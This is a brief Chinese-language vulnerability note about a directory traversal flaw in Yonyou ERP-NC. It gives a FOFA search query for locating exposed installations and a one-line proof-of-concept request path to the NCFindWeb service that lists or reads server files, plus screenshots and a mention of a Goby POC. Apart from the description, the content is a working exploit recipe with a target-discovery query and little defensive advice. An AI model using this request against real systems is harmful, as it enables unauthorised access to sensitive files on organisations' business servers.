# 用友ERP-NC 目录遍历漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

用友ERP-NC 存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

用友ERP-NC

### FOFA <a href="#fofa" id="fofa"></a>

app="用友-UFIDA-NC"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

POC为

```
/NCFindWeb?service=IPreAlertConfigService&filename=
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm88_yILyjjHqBUpJS%2F-MhmA0b-z3aRX4j2g4yh%2Fimage.png?alt=media\&token=0a09fa7e-cc0e-4158-940d-44651e5fff3f)

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm88_yILyjjHqBUpJS%2F-MhmA2Nop7oTI0x0h5nD%2Fimage.png?alt=media\&token=0894680d-d6b0-43ad-8c6a-2956dc3d40b6)

### Goby & POC <a href="#goby--poc" id="goby--poc"></a>

YongYou ERP-NC directory traversal

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm88_yILyjjHqBUpJS%2F-MhmA80G5QPoTKpfxuEz%2Fimage.png?alt=media\&token=cb5fc234-1f48-49be-a162-18b761897f9f)